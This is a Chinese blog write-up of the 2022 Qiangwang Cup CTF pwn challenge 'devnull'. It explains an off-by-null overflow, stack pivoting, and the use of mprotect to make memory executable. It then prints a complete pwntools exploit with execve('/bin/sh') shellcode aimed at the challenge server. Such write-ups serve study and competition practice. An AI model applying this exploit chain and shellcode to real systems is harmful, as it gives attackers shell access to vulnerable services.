【栈迁移】强网杯2022 -- devnull

已于 2023-12-07 10:24:30 修改
阅读量97 收藏
点赞数
分类专栏: # 每日一“胖“ 文章标签: 栈迁移 ROP
于 2023-12-07 09:56:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61670993/article/details/134847194
版权

前言

题目不算难,多调一调就ok啦。但感觉我这个pay不是最优的,比较极限。

漏洞分析与利用

保护:没开 Canary 和 PIE

关键函数如下:

1)buf 的大小是32字节,而 fgets 了33字节,但是 fgets 本身最多读取32字节,最后会填上一个\x00,所以这里是一个 off by null 溢出,其刚好可以把 fd 修改为 0

2)通过1)可以把 fd 修改为0,所以这时 read(fd, &v2, nums_0x2c) 又会存在溢出,因为 v2 仅仅是一个 int 类型。但是这里刚好溢出到返回地址,所以考虑栈迁移。同时这里可以修改 ptr 指针的值

3)通过2)修改 ptr 的值,这里就可以实现任意地址写 0x60 字节。所以这里可以为栈迁移做好准备。但是在 mp 函数中会将 bss 段设置为只可读,所以这里无法栈迁移到 bss 上。但是程序没有开启 PIE 所以可以直接栈迁移到程序数据段,因为数据段是可读可写的。

栈迁移后考虑如何 get_shell,这里是无法泄漏相关 libc 地址的(主要是没有足够的 gadget 去控制 rdi/rsi/rdx 等寄存器,csu 好像也没看到),但是题目本身执行了 mprotect 函数,所以可以利用其来将一段地址设置为可执行。

然后 mprotect 这里的 rsi 可被控制为 0x1000,rdi 被设置为 rax,所以我们得想办法控制 rax = target_addr 和 rdx = 7,我们可以找到如下 gadget 控制 rax,但是题目找不到直接或间接控制 rdx 的 gadget。

0x0000000000401350 : mov rax, qword ptr [rbp - 0x18] ; leave ; ret

但是,但是我们调试发现当栈迁移后,rdx 就是7,然后回到程序中可以发现在退出前执行了如下操作:

可以看到,rdx = strlen(str),而 "Thanks\n" 刚好7字节,所以最后 rdx 就是7

程序返回前把标准输出关了,但是每关标准错误输出,所以重定向一下就好了

然后就是去构造 rop 了,这里就是根据读者的喜好了,exp 如下:

这里运气比较好,两段 shellcode 都是 0x10 大小,刚刚合适并且刚刚好填满 0x60 字节

from pwn import *
context.terminal = ['tmux', 'splitw', '-h']
context(arch = 'amd64', os = 'linux')
#context(arch = 'i386', os = 'linux')
#context.log_level = 'debug'

#io = process("./pwn")
io = remote("node4.anna.nssctf.cn", 28077)
elf = ELF("./pwn")
libc = elf.libc

def debug():
        gdb.attach(io)
        pause()

sd     = lambda s    : io.send(s)
sda    = lambda s, n : io.sendafter(s, n)
sl     = lambda s    : io.sendline(s)
sla    = lambda s, n : io.sendlineafter(s, n)
rc     = lambda n    : io.recv(n)
rl     = lambda      : io.recvline()
rut    = lambda s    : io.recvuntil(s, drop=True)
ruf    = lambda s    : io.recvuntil(s, drop=False)
addr4  = lambda n    : u32(io.recv(n, timeout=1).ljust(4, b'\x00'))
addr8  = lambda n    : u64(io.recv(n, timeout=1).ljust(8, b'\x00'))
addr32 = lambda s    : u32(io.recvuntil(s, drop=True, timeout=1).ljust(4, b'\x00'))
addr64 = lambda s    : u64(io.recvuntil(s, drop=True, timeout=1).ljust(8, b'\x00'))
byte   = lambda n    : str(n).encode()
info   = lambda s, n : print("\033[31m["+s+" -> "+str(hex(n))+"]\033[0m")
sh     = lambda      : io.interactive()
menu   = b''

#gdb.attach(io, 'b *0x0000000000401436')

leave_ret = 0x0000000000401354 # leave ; ret
call_mprotect = 0x00000000004012D0
mov_eax = 0x0000000000401351 # mov eax, dword ptr [rbp - 0x18] ; leave ; ret
pop_rbp = 0x000000000040129d # pop rbp ; ret
jmp_rax = 0x000000000040122c # jmp rax
start = 0x3fc000 + 0x1000

sda(b'filename\n', b'A'*32)
pay = b'B'*(0x1c-8) + p64(start-8) + p64(start-8) + p64(leave_ret)
sda(b'discard\n', pay)

shellcode0 = asm("""
        xor edx, edx
        xor esi, esi
        mov eax, 0x3b
        mov ebx, 0x3fd048
        jmp rbx
""")

shellcode1 = asm("""
        mov rdi, 0x68732f6e69622f
        push rdi
        mov rdi, rsp
        syscall
""")
print(hex(len(shellcode0)))
print(hex(len(shellcode1)))

pay  = p64(start+0x18+0x8) + p64(mov_eax) + p64(start) + shellcode0 + p64(start+0x10) + p64(call_mprotect)
pay += p64(start+0x18+0x18+0x8) + p64(mov_eax) + p64(jmp_rax) + shellcode1
print(hex(len(pay)))
sda(b'data\n', pay)

#debug()
sh()

效果如下:

XiaozaYa
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
使用 fast-export 将代码库由 Hg(Mercurial) 迁移至 Git
Dorthyn的博客
03-16 654
借助自动化工具将hg迁移至git。
subprocess- 子流程管理
Allen_by的博客
10-03 985
subprocess该模块允许您生成新进程,连接到其输入/输出/错误管道,并获取其返回代码。该模块打算替换几个较旧的模块和功能: os.system os.spawn* 使用模块subprocess 推荐的调用子流程的方法是将该run() 功能用于它可以处理的所有用例。对于更高级的用例,Popen可以直接使用基础接口。 该run()功能是在Python 3.5中添加的;如果您需要保留与旧版本的兼容...
【第六届强网杯CTF-Wp】
qq_45603443的博客
08-02 2477
第六届强网杯全国网络安全挑战赛wp
[2022 强网杯] devnull 复现
weixin_52640415的博客
08-05 372
2022 第六届 强网杯 devnull
2022强网杯pwn部分wp
N1rvana的博客
08-02 1498
2022强网杯pwn
推荐开源项目:devnull-as-a-service
gitblog_00018的博客
05-24 349
推荐开源项目:devnull-as-a-service 项目地址:https://gitcode.com/noqqe/devnull-as-a-service 1、项目介绍 devnull-as-a-service,简称DaaS,是一个创新的云服务解决方案,它遵循了YWGNI(You weren't gonna need it)宣言的精神,将数字极简主义的理念带入到云计算领域。该项目赢得了201...
Android系统启动流程 -- bootloader
qq_30427341的博客
12-14 2712
Android系统启动流程 -- bootloader   BootLoader:在嵌入式操作系统中,BootLoader是在操作系统内核运行之前运行。可以初始化硬件设备、建立内存空间映射图,从而将系统的软硬件环境带到一个合适状态,以便为最终调用操作系统内核准备好正确的环境。在嵌入式系统中,通常并没有像BIOS那样的固件程序(注,有的嵌入式CPU也会内嵌一段短小的启动程序),因此整个系
Android系统启动过程---uboot,kernel,android
莹波&微步
07-11 2639
摘要:本文讲解Android系统在启动过程中的关键动作,摈弃特定平台之间的差异,讨论共性的部分,至于启动更加详细的过程,需要结合代码分析,这里给出流程框架,旨在让大家对开机过程更明了。   关键词:U-boot、Linux、Android   目录:        第一部分:Bootloader启动 一、Bootloader的定义和种类 二、Arm特定平台
Linux c 开发-24 程序后台运行
zhaogaojian的专栏
03-21 15
新建一个sh文件 !/bin/sh sudo nohup xxxxx >/dev/null 2>log & 上面是保存错误信息到log文件里 Linux的3种重定向 0:表示标准输入 1:标准输出,在一般使用时,默认的是标准输出 2:标准错误信息输出 什么也不保存 nohup ./program >/dev/null 2>&1 & ...
log-devnull:通用记录器 API 的 devnull 实现
07-02
在"log-devnull-develop"这个文件夹中,很可能包含了这个库的源代码、开发相关的文件,比如配置文件、测试脚本等。开发者可以通过阅读这些源码来了解其内部实现,学习如何设计这样的实用工具,也可以参与到项目的...
【天格】战队-已解出题目附件-第六届“强网杯”全国网络安全挑战赛
08-01
【天格】战队在第六届“强网杯”全国网络安全挑战赛中展现出卓越的技能和深入的理解,这是一场集技术、策略与团队协作于一体的顶级赛事。挑战赛中的解题附件揭示了网络安全领域的多个关键知识点,涵盖了逆向工程、...
devnull-as-a-service:“ devnull即服务”是由hugo生成的网站
04-30
"devnull-as-a-service"是一个基于Hugo框架构建的网站,其核心概念是对"devnull"的幽默诠释,"devnull"在计算机术语中通常表示一个黑洞,用于丢弃无用的数据,不会产生任何响应。这个项目将"devnull"的概念转化为一...
sails-devnull:Sails.js Waterline 的非持久内存外适配器
06-28
帆-devnull地位稳定性: - 实验性目的Sails 的/dev/null适配器等等?! 这些不是你要找的数据想法职责分离方式 FooBarCommand . create ( req . params . all ( ) , function ( err , sanitized_data ) { if ( err )...
dev-null-cli:跨平台的`devnull`
05-26
dev-null-cli 跨平台 安装 $ npm install --global dev-null-cli 用法 $ dev-null --help Examples $ dev-null | cat $ echo ':unicorn:' | dev-null 有关的 stream-不产生数据的可读Node.js流或丢弃数据的可...
磁力链磁力链磁力链.txt
最新发布
07-22
磁力链
“人力资源+大数据+薪酬报告+涨薪调薪”
07-22
人力资源+大数据+薪酬报告+涨薪调薪,在学习、工作生活中,越来越多的事务都会使用到报告,通常情况下,报告的内容含量大、篇幅较长。那么什么样的薪酬报告才是有效的呢?以下是小编精心整理的调薪申请报告,欢迎大家分享。相信老板看到这样的报告,一定会考虑涨薪的哦。
安装graphviz和pygraphviz
07-22
pygraphviz 是一个Python库,它是Graphviz图形可视化软件的Python接口。Graphviz是一个开源的图形可视化软件,广泛用于创建和编辑有向图和无向图。pygraphviz使得Python开发者能够轻松地创建和操作图形,以及执行图形的布局和可视化。 一、pygraphviz的主要功能 创建和编辑图形:pygraphviz允许开发者通过Python代码来创建图形,包括添加节点、边等元素,并且可以编辑这些元素的属性,如颜色、形状、标签等。 图形布局:pygraphviz支持多种图形布局算法,如dot、neato、circo等,开发者可以根据需要选择合适的算法来优化图形的布局。 图形可视化:pygraphviz可以将创建和编辑好的图形保存为图片文件,支持多种图片格式,如PNG、JPEG等,方便开发者进行展示和分享。
BrainF**k Devlopment Toolkit
07-22
BrainF**k Devlopment Toolkit(BFDTK),可用于开发BrainF**k程序。
逐条解释 import subprocess new_pass = "your_new_password" command = f'echo {new_pass} | sudo passwd --stdin root' subprocess.run(command, shell=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
07-13
4. `subprocess.run(command, shell=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)`: 使用`subprocess.run()`函数来执行命令行命令。这个函数接受一个命令字符串作为参数,并通过`shell=True`参数...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值